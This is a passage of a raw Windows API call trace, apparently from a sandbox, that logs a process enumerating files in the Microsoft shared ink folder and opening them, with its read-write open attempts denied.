hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0100.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0100.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.550] AreFileApisANSI () returned 1 [0100.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll", lpUsedDefaultChar=0x0) returned 63 [0100.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0100.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.551] AreFileApisANSI () returned 1 [0100.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0100.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6dfa8 [0100.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6dfa8, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll") returned 63 [0100.551] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwgst.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.551] GetFileType (hFile=0x368) returned 0x1 [0100.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0100.551] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.551] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.552] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.552] CloseHandle (hObject=0x368) returned 1 [0100.552] AreFileApisANSI () returned 1 [0100.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0100.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6de98 [0100.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6de98, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll") returned 63 [0100.552] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwgst.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.552] GetLastError () returned 0x5 [0100.552] GetLastError () returned 0x5 [0100.552] SetLastError (dwErrCode=0x5) [0100.553] GetLastError () returned 0x5 [0100.553] SetLastError (dwErrCode=0x5) [0100.553] GetLastError () returned 0x5 [0100.553] SetLastError (dwErrCode=0x5) [0100.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0100.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0100.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.553] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8ce781, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe3805ad4, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe3805ad4, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x106a00, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="mshwLatin.dll", cAlternateFileName="")) returned 1 [0100.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0100.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0100.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0100.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0100.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0100.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0100.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0100.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0100.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0100.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0100.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.554] AreFileApisANSI () returned 1 [0100.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwLatin.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwLatin.dll", lpUsedDefaultChar=0x0) returned 65 [0100.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0100.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0100.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0100.554] AreFileApisANSI () returned 1 [0100.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0100.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82568 [0100.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x82568, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwLatin.dll") returned 65 [0100.554] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwLatin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwlatin.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.555] GetFileType (hFile=0x368) returned 0x1 [0100.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82568 | out: hHeap=0x20000) returned 1 [0100.555] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.555] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.555] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.555] CloseHandle (hObject=0x368) returned 1 [0100.555] AreFileApisANSI () returned 1 [0100.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0100.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x824d8 [0100.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x824d8, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwLatin.dll") returned 65 [0100.556] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwLatin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwlatin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.556] GetLastError () returned 0x5 [0100.556] GetLastError () returned 0x5 [0100.556] SetLastError (dwErrCode=0x5) [0100.556] GetLastError () returned 0x5 [0100.556] SetLastError (dwErrCode=0x5) [0100.556] GetLastError () returned 0x5 [0100.556] SetLastError (dwErrCode=0x5) [0100.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x824d8 | out: hHeap=0x20000) returned 1 [0100.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0100.556] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.556] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.556] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076bff5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0100.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0100.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0100.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0100.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0100.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0100.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0100.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0100.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0100.557] AreFileApisANSI () returned 1 [0100.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO", lpUsedDefaultChar=0x0) returned 57 [0100.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0100.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.557] AreFileApisANSI () returned 1 [0100.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0100.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO") returned 57 [0100.557] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.557] GetLastError () returned 0x5 [0100.557] GetLastError () returned 0x5 [0100.557] SetLastError (dwErrCode=0x5) [0100.557] GetLastError () returned 0x5 [0100.557] SetLastError (dwErrCode=0x5) [0100.558] GetLastError () returned 0x5 [0100.558] SetLastError (dwErrCode=0x5) [0100.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0100.558] AreFileApisANSI () returned 1 [0100.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a4b0 [0100.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6a4b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO") returned 57 [0100.558] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.558] GetLastError () returned 0x5 [0100.558] GetLastError () returned 0x5 [0100.558] SetLastError (dwErrCode=0x5) [0100.558] GetLastError () returned 0x5 [0100.558] SetLastError (dwErrCode=0x5) [0100.558] GetLastError () returned 0x5 [0100.558] SetLastError (dwErrCode=0x5) [0100.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0100.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0100.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0100.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0100.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0100.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0100.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0100.559] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076c75d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0100.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0100.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0100.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0100.559] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78150 [0100.559] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076bff5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.559] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e90ce26, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e90ce26, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e90ce26, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0100.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0100.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0100.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46128 [0100.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0100.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0100.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0100.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 